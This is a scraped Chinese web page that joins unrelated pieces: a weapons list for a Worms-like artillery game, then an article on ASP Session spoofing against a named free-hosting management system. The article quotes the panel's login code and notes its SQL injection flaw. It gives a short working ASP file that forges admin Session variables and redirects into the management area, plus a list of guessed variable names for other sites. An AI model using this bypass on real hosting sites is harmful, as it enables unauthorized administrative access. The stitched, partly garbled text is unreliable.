1,升龙拳(就是象街霸的那个动作,威力不大。主要把敌人往水里打。后面有介绍)
2,拳头2(打脸的 威力不大。敌人中弹后水平后移)
3, (威力大,对自己而言:(,划出横线出去然后爆炸!)
4,B4(用了就知道是什么了)
5,绵羊(威力大,但是不能控制,丢出去了羊自己跑。在敌人附近的时候引爆,出现大坑)
6,牛?(以前没有的,我搞清楚了再说,好象可以钻洞的炸弹)
第4排
1,鞭炮(威力大,好东西,可以炸很 远,注意放下后有5秒的时间跑哦)
2,地雷(威力不大,是那种放在空地上不炸,有人来才炸的,
当然你可以丢在别人身上)
3,空袭(呼唤空中的飞机丢炸弹,几局后才可以用。注意风向)
第5排
1,推土机(藏起来的好东西,花样多比较多的武器。)
2,钻(垂直方向钻土的东西。但然,BT的玩法是在敌人头上用这个东西。)
3,钢梁(可以放在地图上 临时的桥梁。可以封敌人,保护自己,当梯子。。。)
4,棒球棍(把敌人打到天上去的,使用的时候注意紧靠敌人,方向调整向上80度。敌人飞上天了)
5,瞬间移动(移动到地图的任何一个地方,使用后本回合结束)
第6排
1,绳子(经典道具,太经典了,不多说了。多练习就知道了,注意物理中的左右荡绳子时加上绳子上下缩放。)
2,蹦极(头向下的东西)
3,降落伞(高处跳下不会摔伤的道具,先选择,跳下后打开。不要被风刮到水里去了哦)
第7排
1,臭蚰(中毒)
第8排
1,跳绳(除非你有足够把握,不要用,相当于下棋中的让子)
2,白旗(/。。。。不说了 ,你自己看看就知道了)
第9排
1,换人(选人吧)
2,飞行器(可以飞来飞去)
还有很多武器都是要接的,不知道电脑中的这里有没有了
比较经典的时候
香蕉炸弹(威力超级大接到后看看就知道了。超过绵羊炸弹。)
飞天绵羊(可以控制飞行的绵羊。好东西)
..........
还有很多武器,世界末日,汽油瓶。空中的地毯轰炸等等 大家自己去体会吧!
篇7:Session欺骗的终极技术
看了第四期LM团伙写的《利用Session欺骗构造最隐蔽的WebShell》,虽然具体技术不是很明白,但是基本意思理解了,忽然有了自己的一点思想:现在的免费空间主目录和用户的目录都在同一个网站上,例如网站主目录是d:wwwroot,而用户申请的免费空间的目录就是d:wwwroot用户名,例如d:wwwrooticeworld,主站的管理员登录是通过Session验证的,如果我们在自己的空间内构造一个同主站相同的Session变量以及Session的值,是不是就可以欺骗主站呢?
不知道大家理解了没。
假如adminlogin.asp是主站管理员登录页面,如果登录成功,就把Session(“login”)=“yes”,并转到adminmanage.asp进行管理。当然,adminmanage.asp有Session(“login”)的检测。现在我们在自己申请的空间目录iceworld中建立一个文件admin.asp,这个文件的作用是使Session(“login”)=“yes”,我们先访问自己的admin。asp,然后访问adminlogin.asp,应该不用再登录了,而是直接进入adminmanage.asp。事实是否可以呢?我们找个免费空间测试一下。
以九酷网络提供的免费空间管理系统(V 4.0免费版)为例子来说明吧,本地测试先。
我们先分析一下。主目录是d:wwwroot9coolhome,管理目录是d:wwwroot9coolhomemanage。默认用户目录是d:wwwroot9coolhome用户名。
先看看管理员登录过程,登录文件是login.asp,关键代码如下:
code=replace(trim(Request(“code”)),“’”,“”)
If codeCStr(Session(“CheckCode”)) Then
Response.Write(“”)
Response.End
end if
’上面代码是对验证码进行检测
name=htmlencode2(request.form(“name”))
pwd=htmlencode2(md5(request.form(“pwd”)))
loginip=Request.ServerVariables(“HTTP_X_FORWARDED_FOR”)
if loginip= “” then loginip=Request.ServerVariables(“REMOTE_ADDR”)
sql=“select * from manage_user where UserName=’”&name&“’ And PassWord=’”&pwd&“’”
rs.open sql,conn,1,3
If not rs.eof = True Then
rs(“logintime”)=Now()
rs(“loginip”)=loginip
rs.update
Session(“name”) = rs(“username”)
Session(“pwd”) = rs(“password”)
Session(“time”) = now()
Response.Redirect(“default.asp”)
’如果接受到的用户名和密码正确,更新最后登录时间和IP地址,并且赋值给3个Session变量,然后转到管理页面default.asp,不知道大家有没有注意到那个SQL语句也有问题啊!
else
set rs2=server.createobject(“adodb.recordset”)
sql2=“select * from log”
rs2.open sql2,conn,1,3
rs2.AddNew
rs2(“type”)=“非法登录”
rs2(“username”)=name
rs2(“password”)=request.form(“pwd”)
rs2(“loginip”)=loginip
rs2(“time”)=now()
rs2.update
rs2.Close
set rs2=nothing
Response.write“”
end if
’如果登录失败的话,填写错误登录日志
管理页面default.asp的第一行包含了一个文件,,而这个admin.asp就是用户权限审核页面了,我们看看:
<%
if Session(“name”)=“” then
Response.write“”
response.End
end if
%>
只要Session(“name”)不为空就认为登录成功啊,好办了!我们申请一个用户iceworld,上传一个文件index.asp到自己的目录中去,内容如下:
<%
Session(“name”)=“yes”
response.Redirect(“../manage/default.asp”)
%>
访问看看,是不是直接进入了管理页面,
要进行这种Session欺骗,必须有三个前提:
1.进行欺骗的网页和被欺骗的网页必须位于同一个网站内,上期黑防上LM团伙和koshan已经说得很清楚了。
2.必须知道管理页面。
3.必须知道Session变量以及它的限制条件。
至于解决方法,第一个问题就不用说了吧,这篇文章就是在这个前提下进行的。第二个问题,相信大家以前SQL注入的时候早就遇到过,各显神通吧!对于第三个问题,首先看看主站是不是使用了别人写的程序,如果是的话,下载一个源程序进行查看,应该不会有很多人喜欢改源代码吧!如果是站长自己写的程序的话,我们就猜,跟猜后台一样:
Session(“name”)=“admin”
Session(“login”)=“admin”
Session(“AdminName”)=“admin”
......
当然不要手工进行了,我们在admin.asp中写上:
<%
Session(“name”)=“admin”
Session(“login”)=“admin”
Session(“AdminName”)=“admin”
’加上其它你所知道的
%>
为了照顾不会写ASP的同仁们,所以我写了一个简单的利用页面(见光盘index.asp)。很容易理解的。如果你刚好申请的是九酷的免费空间,的填写就可以了。
最后说明两点:
第1:虽然本文标题说是突破免费空间,但是应用不仅仅是免费空间哦!
第2:看了第四期中彭硕大哥写的《打破SSS的技术封锁》,只有一个感觉――爽!没有什么高深的技术,因为我基本上都能理解,而这种思路是学不来的!感谢黑防为我们提供这样好的文章,期待更好的文章!
★ 终极面试建议
★ 终极客户的范文
★ 新式武器想象作文
★ 终极一班2口号
★ 终极面试观后感想
★ 各种状语从句一览
的终极武器DDoS技术一览(共7篇)




